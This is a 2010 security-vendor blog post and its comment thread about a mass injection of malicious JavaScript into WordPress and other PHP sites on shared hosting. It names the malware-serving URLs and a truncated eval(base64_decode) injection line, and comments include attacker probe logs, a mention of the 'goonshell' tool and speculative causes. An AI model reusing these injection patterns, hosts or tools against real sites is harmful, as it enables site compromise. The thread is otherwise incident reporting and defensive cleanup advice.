New attack today against WordPress

May 7, 2010 by 61 Comments

Update 2: Simple clean up solution: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Update 1: Note that we are not blaming WordPress here. I am assuming that if the problem was on WordPress itself, the number of infected sites would be much much bigger. Maybe a plugin is vulnerable or someone stole lots of passwords. Also, all the hacked sites were on shared hosts, no one so far on a private server.

We are seeing multiple reports today of WordPress sites (running their latest version) getting compromised. The initial reports today were restricted only to Dreamhost, but now we are seeing the same pattern on blogs hosted at GoDaddy, Bluehost, Media temple and other places.

So, it doesn’t look like something specific to a hosting company. The only thing in similar is that all of them are on shared servers.

All those sites had this javascript added to their pages:

http://www.indesignstudioinfo.com/ls.php
http://zettapetta.com/js.php

Which came from a long base64 encoded string added to their footer.php file (or on all the PHP files in some cases).

You can get more information about the encoded string here (and the final decoded code):
http://sucuri.net/malware/entry/MW:MROBH:1

One thing very interesting that is becoming a trend is that the malware is also hiding from Google. This causes the site to do not get blacklisted, making it harder for the owner to notice.

People are talking on the forums already:
http://wordpress.org/support/topic/396524
http://www.webhostingtalk.com/showthread.p..
http://collabtive.o-dyn.de/forum/view..

How are they getting hacked? We have no clue yet… We can only restrict to a few issues:

  1. Stolen FTP/WP password

  2. Bug on WordPress

  3. Bug on some WordPress plugin

  4. Brute force attack against the passwords

Send us more information if you know something.

The guys from WP security lock did a good thread on the issue. You can read here

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Filed Under: Uncategorized Tagged With: , , ,
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • http://lunchtimemastermind.com Doug Mitchell

    Not sure if this is why…but MediaTemple did a big DB pword autoreset on everyone a couple days ago. It WAS planned but maybe they had this vulnerability in mind when they did.

  • http://www.dirtyphonebook.com Brandon Wilbur

    I've seen so many of these small websites get hacked that I'm starting to doubt that WordPress is at fault, it's something in the shared hostings' configuration.

    WordPress is a bit hacky and has some bad code though so it certainly possible that they're at fault, but until I know more I can't say with any certainty.

  • http://jessicamah.com Jessica Mah

    Many hosts use something called Fantastico, which is a script that people use to install their wordpress blogs in the first place. Likely that this is the source of the problem.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Jessica: How do you know this is the source of the problem?

  • http://www.blogger.com/profile/04162422038677318548 m

    I recently came across a dreamhost user who had two separate domains, both with WP installed, and both were hacked with the same script. The websites were unrelated beyond the fact that they were installed on the same dreamhost user. This seems like a pretty strange coincidence to me.

  • http://makenothingonline.blogspot.com John

    I spotted this on a couple of wordpress blogs this morning then started avoiding them :-( A lot of malware seems to be targeting wordpress recently :-(

  • Anonymous

    Can't get into my NS File Manager though my own Account Manager.

    I get . . .

    Error
    Invalid UserID and Password!

  • James

    Not just wordpress. I have a joomla site that was just hacked! Hosted on godaddy.

  • James

    Just to follow up with the last post. I have zero wordpress sites on the previously mentioned godaddy account. I just found out that both my joomla site and phpld site were hacked. It is shared hosting.
    James

  • Anonymous

    Hi, I have hosting with Dreamhost, and one of my sites that is written in php, but not WordPress, also has this script injected in the footer, however only in index.php. This definitely is not just a WordPress thing, maybe it's a php thing…

  • http://www.blogger.com/profile/14888817148121175513 Jamie Gilliam

    James,

    I've got a Joomla site that was knocked out early this morning sometime as well. Anyone have any ideas on a fix?

  • james

    I checked several php pages and they were all infected. It was the smaller of the two sites so I decided to wipe it and start fresh. Will get a dedicated ip though. My joomla sites on bluehost that had a dedicated ip were not affected.

  • Anonymous

    This is only affecting PHP scripts in shared hosting, and it seems to reach past WordPress.

    Can anybody post some details of the apps they are running on the affected servers (Name, Version, Installation procedure (tarball, auto-install script, etc.))

  • http://www.sitebyjames.com/ James

    Maybe it's a cloud security breach on linux. There was a major vulnerability last summer with the kernel. That was fairly serious if you ask me.

    Hopefully someone will come forward and take responsibility instead of the "it's the hosts" fault, or "it's wordpress problem", or it's a "php problem", or it's an "Iranian cyber terrorist problem", or it's everybodies problem except my own.

    DIY and Open Source software is dead… Long live the brand name!

  • http://www.sitebyjames.com/ James

    Sorry… I didn't mean to sound like I was some sort of authority on open source software.

    I just think that anything that can knock out more than just a few different websites on a few different hosts is fundamentally a much larger problem.

    This is a really good video… I am not a linux or cloud hosting expert. But this guy is.

    http://www.youtube.com/watch?v=L2SED6sewRw

  • http://www.blogger.com/profile/06217025657058369608 Brad M.

    The issue is not just WordPress, but any PHP. Our old manual PHP site was also infected with this BS. Too bad whois searches for the owner comes up blank.

  • Anonymous

    My main gripe with WP is they don't take security seriously enough anymore. Things have changed. The cybercriminals are ahead of the game and winning. WP needs to start providing "security updates and patches." It's that simple. Just like Firefox and SMF and others do.

    You can't just say "we're safe!" when your whole community is getting pounded by guided missile's and your end users are dropping like flies.

    The real reality as of this moment though is it's everyone's problem. If we would stop seeing everything as a competition we might start making some real progress.

    The whole U.S. cybergrid is being threatened and we better get it together and stop being passive about it.

  • Anonymous

    Thanks for that snippet of php – Very thankfully did the trick! Alex

  • Anonymous

    Got an affected JOOMLA site. Its on a dreamhost host

  • http://www.blogger.com/profile/13210697558886179420 abhishek

    I faced the same issue today on my wordpress site hosted on godaddy.

    thanks for the solution posted. it worked.

  • Anonymous

    This is probably one of those attacks where a trojan on a webmaster's computer is reading and forwarding FTP accounts, logs in from a different computer with the FTP account and changes the files.

    Changing the FTP passwords or rights doesn't have much use, unless you detect and remove the trojan on the FTP client computers first (or only use sFTP ofcourse, where passwords are encrypted)

  • Anonymous

    most infections i came across at customer sites relate to stolen credentials (ie. ftp accounts). usually they found a virus infection on their computers later or even prior but did not change their passwords. that those guys infected php files (but some hacks like the one having an iframe with "/grep" in the url will also go for html files), its just because its available at nearly every host in the net, so it makes a perfect target.

  • Anonymous

    Furthermore, some of these trojans also are capable of sniffing out FTP credentials on network-traffic, so a clean webmaster's computer is sometimes not enough….

  • Anonymous

    One of our client sites, on GoDaddy, running Joomla 1.5.15 is also affected. We installed and uninstalled WordPress on this shared hosting account before, and their current site uses Joomla.

  • http://beingruth.com/ Ruth

    It's definitely not JUST Fantastico. One of my client's sites was hacked & I installed it manually. Bookmarked your script to use for the next client to fall (hopefully none). Fortunately, we had good backups.

  • http://www.blogger.com/profile/16408117576118457613 Riyad

    This is completely circumstantial — but I've been hit by this hack 3 times in the last 2 years. Each time an IFRAME is inserted into the page — the first two times the hack infected *every* single html/php file on my server (private hosting on SliceHost, 16-character passwords, SSH-access only with shared/private key, no other admins besides myself) — the 3rd time the hack only infected a few key php files like page.php and one of my template files.

    I kept search on "WordPress IFRAME injection" and while I didn't find a direct answer — everything was very inconclusive and confusing — I did notice a *trend* of conversations between WordPress and Joomla folks around "TinyMCE" and server-side JavaScript execution possibly being an issue.

    I have no idea how valid this is or how that would even work, but the first thing I did was lock down every account that was higher than "subscriber" in my WordPress install and so far so good…

    I don't know if that means it was TinyMCE, but I do know that I've been hacked the same way from 3 separate "start from scratch because I just got hacked" installs of WordPress ranging from 2.5 to 2.9.1 over the last few years — different hosts (RimuHosting, AWS and Slicehost), different sets of passwords for everything — pretty much all the variables changed each time EXCEPT the user accounts that had "author" access (and subsequently could cause TinyMCE to load) and TinyMCE itself inside the WordPress install.

    I've also always used the "TinyMCE Advanced" plugin to expose more of the TMCE features, maybe that enables some portion of TinyMCE that is allowing this to happen?

    Anyway — just wanted to share my information incase it helps anyone else.

    Good luck out there!

  • Anonymous

    getCookie("pma_visited_theme1");

    Seems to indicate it's a PhpMyAdmin attack.

    -Sasha.

  • Anonymous

    For what it's worth, here are some unsuccessful access attempts against obviously related to the current attacks:

    access_log.1:95.211.132.79 – - [03/May/2010:19:29:19 -0700] "GET /administrator/index.php HTTP/1.1" 404 191
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:20 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 404 195
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:20 -0700] "GET /site/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:21 -0700] "GET /cms/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.78 – - [03/May/2010:19:29:21 -0700] "GET /content/administrator/index.php HTTP/1.1" 404 195
    access_log.1:95.211.132.70 – - [03/May/2010:19:29:21 -0700] "GET /home/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.70 – - [03/May/2010:19:29:22 -0700] "GET /main/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:22 -0700] "GET /portal/administrator/index.php HTTP/1.1" 404 194
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:22 -0700] "GET /web/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:22 -0700] "GET /v1/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.70 – - [03/May/2010:19:29:23 -0700] "GET /v2/administrator/index.php HTTP/1.1" 404 192
    access_log.1:95.211.132.78 – - [03/May/2010:19:29:23 -0700] "GET /j/administrator/index.php HTTP/1.1" 404 192
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:23 -0700] "GET /en/administrator/index.php HTTP/1.1" 404 192
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:24 -0700] "GET /joom/administrator/index.php HTTP/1.1" 404 194
    access_log.1:95.211.132.70 – - [03/May/2010:19:29:24 -0700] "GET /Joomla/administrator/index.php HTTP/1.1" 404 195
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:24 -0700] "GET /joomla1.5/administrator/index.php HTTP/1.1" 404 198
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:25 -0700] "GET /joomla15/administrator/index.php HTTP/1.1" 404 197
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:25 -0700] "GET /joomla2/administrator/index.php HTTP/1.1" 404 196
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:25 -0700] "GET /joomla1/administrator/index.php HTTP/1.1" 404 196
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:25 -0700] "GET /Site/administrator/index.php HTTP/1.1" 404 194
    access_log.1:95.211.132.78 – - [03/May/2010:19:29:26 -0700] "GET /site_old/administrator/index.php HTTP/1.1" 404 197
    access_log.1:95.211.132.75 – - [03/May/2010:19:29:26 -0700] "GET /Site_old/administrator/index.php HTTP/1.1" 404 197
    access_log.1:95.211.132.79 – - [03/May/2010:19:29:26 -0700] "GET /cms_old/administrator/index.php HTTP/1.1" 404 197
    access_log.1:95.211.132.78 – - [03/May/2010:19:29:27 -0700] "GET /joomla_old/administrator/index.php HTTP/1.1" 404 199
    access_log.1:95.211.132.78 – - [03/May/2010:19:29:27 -0700] "GET /CMS/administrator/index.php HTTP/1.1" 404 193
    access_log.1:95.211.132.70 – - [03/May/2010:19:29:27 -0700] "GET /test/administrator/index.php HTTP/1.1" 404 194
    access_log.1:95.211.132.76 – - [03/May/2010:19:29:28 -0700] "GET /backup/administrator/index.php HTTP/1.1" 404 196
    access_log.3:95.211.132.70 – - [20/Apr/2010:08:58:44 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 404 195
    access_log.4:95.211.132.70 – - [15/Apr/2010:10:48:10 -0700] "GET /get_orders_list.php HTTP/1.1" 404 189

  • Anonymous

    Here's another snippet where he's trying different Client strings in an effort to figure out why my machines have been successful in automatically thwarting his new attacks…
    Where you see a 200 indicating success, he's only successful in having his IP address banned, so he moves on the the next IP – Hmm, even Googlebot gets banned he notices…

    other-access_log.2:95.211.132.75 – - [27/Apr/2010:07:43:04 -0700] "GET /v1/administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.2:95.211.132.70 – - [27/Apr/2010:07:43:05 -0700] "GET /v2/administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.2:95.211.132.78 – - [29/Apr/2010:07:20:31 -0700] "GET /administrator/index.php HTTP/1.1" 404 3181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.2:95.211.132.70 – - [29/Apr/2010:07:20:33 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.2:95.211.132.78 – - [29/Apr/2010:07:20:44 -0700] "GET /cms/administrator/index.php HTTP/1.1" 404 3181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.3:95.211.132.69 – - [24/Apr/2010:11:51:42 -0700] "GET /administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.3:95.211.132.74 – - [24/Apr/2010:11:51:44 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 200 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"

    … if he's reading – I'll give you a hint dumbass, I've set up apache's regex to screen all incoming url's for software I DON'T have installed and instantly ban that IP address because you're obviously up to no good.

    Where would I get a list of software I DON'T have installed in the first place? Apache error logs. They were once full of probes just like this for non-existent URLs, that is until I set up my auto-blacklist. Just make sure the list doesn't contain a valid URL on your server or else you'll ban legitimate users.
    Other than that, it works really well.

    Here's another Tip: Set up Apache's authentication controls around the admin directory or at least the login script if you can.

    -catbutt

  • Anonymous

    Hello,,,,,:) :)

    For us the described "BEHAVIOR" at a visitor site browser is "after the visit and any infection".

    So, we did a lot of Internet searching for a description of how to identify and fix infected visitors of these type web pages and were not successful. And, we apologize if a link exists at SUCURI. Any link or description would be great! :) :)

    (i.e.)For WINDOWS if an infection has occured:

    What the infection does to the visitor
    Any visually identifiable symptoms
    cookies
    files
    registry entries
    msconfig entries
    etc.

    THANKS for your time, help, and advice!!!!! :) :)

    Jerry

  • Anonymous

    This has nothing to do with WordPress. I saw a video of how the hack is occurring. Basically any shared hosting service is totally vulnerable due to the way PHP runs as the same user for all accounts.

    With a program called goonshell you can see and hack all accounts on bluehost or godaddy. All you have to do is get the file upload.
    http://bbs.progenic.com/Topic11483-32-1.aspx

  • Anonymous

    Dear David,

    Could you please investigate and/or confirm what this previous commenter just said?

    I got hacked for the third time today and am certain I've taken every precaution several times over – but it all won't matter a hill of beans if "with a program called goonshell someone can see and hack all accounts on bluehost or godaddy"!

    Thank you!

  • Anonymous

    my Joomla sites were also attacked, but beside them, same thing happened on my testing site with osCommerce, ZenCart and WordPress (same site, just different folders) that was on same Bluehost account as Joomla sites. Interesting thing is, that none of my .php (outside of Joomla, WordPress…) file weren't infected.
    In root of each site I found .php file that was inserting base64_decode line in other .php files, but they had different names (nom.php, weynn.php, att_ins.php…).

    To fix it, I downloaded my sites and used Find&Replace; in Dreamweaver to remove eval(base64_decode("aWYoZnV…fQ==")) and then re-uploaded site again.

  • http://www.simsarmy.co.uk Simsarmy

    This fix added whitespace at the top of every PHP file. Breaking most if not all scripts on my website. I'd greatly enjoy another script to go through and delete all the whitespace before

  • Anonymous

    Simsarmy if you have a large site this script will hang up and not finish. That is what it did on my site. Comment out the line that start with "$rmcode = `find $dir -name "*.php" -type f…." by typing // in front of the line. You should have something that looks like …

    //$rmcode = `find $dir -name "*.php" -type f….

    Save and run this script again. That will remove the extra line from the top of the php pages.

  • Anonymous

    Hosted with Media Temple. They just did an entire DB password reset for customers using shared servers. My WordPress is fine.

  • Anonymous

    Probably just a coincidence but I added my site to seolinkvine.com and the very next day it gets hacked.

  • Anonymous

    Could most of you BE any more stupid? Sites/servers with WP get hacked on numerous different hosting servers…and yet someone how it's the HOST'S problem?

    Wise up and open your eyes.

  • http://www.sitebyjames.com/ James

    Okay, if read this far, it's probably about time to get sensational…

    http://www.bing.com/search?q=wordpress+"hacked+by"

    That's 24 Million results.

    I know Goog shows less, and it's probably because it cleans up faster, rather than anything to do with a duplicate content filter.

    http://www.google.com/search?hl=en&q;=wordpress+%22hacked+by%22

    That's 24 Million reasons not to assume that wordpress or joomla or open source software is a miracle solution which has no downside.

  • http://www.worldwidedancers.com Daniel

    Hello can somebody help me ? I have found this blog topic in google about wordpress security and i would like to know what is happened with my website:
    Thanks to the error below(with some referrer from China) I have my WordPress website once a day or 2 days down – 505 internal server error. To make my website run again I always need to delete .htaccess file . (btw.The way how to make my website run again(to delete .htaccess file) told me bluehost operator .)

    Can anybody help me to explain what is wrong , has my website been hacked or what those errors means? What am i supposed to do now? I'm sure that foreign URLS is something that in my errors shouldn't be (I have about 30 same errors in one minute , always almost the same from this chinese forum:

    [Sun May 23 03:40:59 2010] [error] [client 213.5.70.184] PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so' – /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so: cannot open shared object file: No such file or directory in Unknown on line 0, referer: hxxxp://forum.vipearn.c0m/thread-10523-1-1.html

    http i have changed hxxxp and com to c0m to not spam here

    Can anybody help me to explain how to eliminate this problem? Unfortunately im not PHP – Apache expert at all ,
    I would be very happy if anybody can respond , Daniel

  • Anonymous

    Hello Guys,

    I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.

  • http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/ Stan

    Another hack here through old Mambo installation. I think this is purely thing of file uploaders not being secured. These are part of most Wysiwyg editors like TinyMCE.
    Mor info on our case is here:
    http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  • Pingback: Lots of sites reinfected – Now using holasionweb.com | Sucuri Security

  • Ed Alexander

    I was going to post some great info here, but the limitations set in commenting has totally turned me off and pissed me off so If anyone wants a permanent solution to being hacked just Google "bulletproof security plugin".

    • http://intensedebate.com/people/dremeda dremeda

      My apologies for your dislike of our commenting system. If you have recommendations, please leave some constructive feedback, we're always interested in improving our reader experience.

      Dre

      • Ed Alexander

        Hi,
        Sorry to got so irate there, but I had just finished typing about 30 minutes worth of info and went to submit the post and I got the pop up that I had gone over the maximum allowed character limitation so I kept skimming the content down and in a totally amateur move I did not write the post on my end locally and then copy and paste the info here. Yeah I know rookie mistake. ;) Anyway the posting window had finally had enough of me and decided to crash. So all the content was lost. My mistake for not working from a local copy. Did a knee jerk spaz moment of anger there. Sorry about that. ;)
        Thanks,
        Ed
        My recent post BulletProof Security WordPress Plugin – BulletProof htaccess Security

  • Pingback: Bluehost Malware Attack and Denial by BlueHost

  • Pingback: WordPress bajo ataque a gran escala | Command Line

  • Pingback: Mass Shared Host Website Hack

  • Pingback: WordPress Deployments Attacked

  • Steve

    It seems 123-reg have become victim to this some 6 months on. Other 123-reg php based scripts have also been hacked in ths way.

  • Pingback: Simple cleanup solution for the latest Wordpress hack | Sucuri

  • Pingback: I’ve been hacked! « Notes From The Tech Man

  • Pingback: WordPress Hacked with Zettapetta on DreamHost

  • Pingback: How to Deal with a Hacked Wordpress Blog

  • Pingback: How to Deal with a Hacked Wordpress Blog  

  • Pingback: A Fix for Broken Google Rich Snippets and Google+ Shares | offTheHill

  • Pingback: How to Deal with a Hacked Wordpress Blog |

  • Pingback: How to Deal with a Hacked Wordpress Blog | WeBlogLines.com

  • Pingback: Back in business | Virtuous Code

  • Pingback: How to Deal with a Hacked Wordpress Blog | ViewsandBlogs.com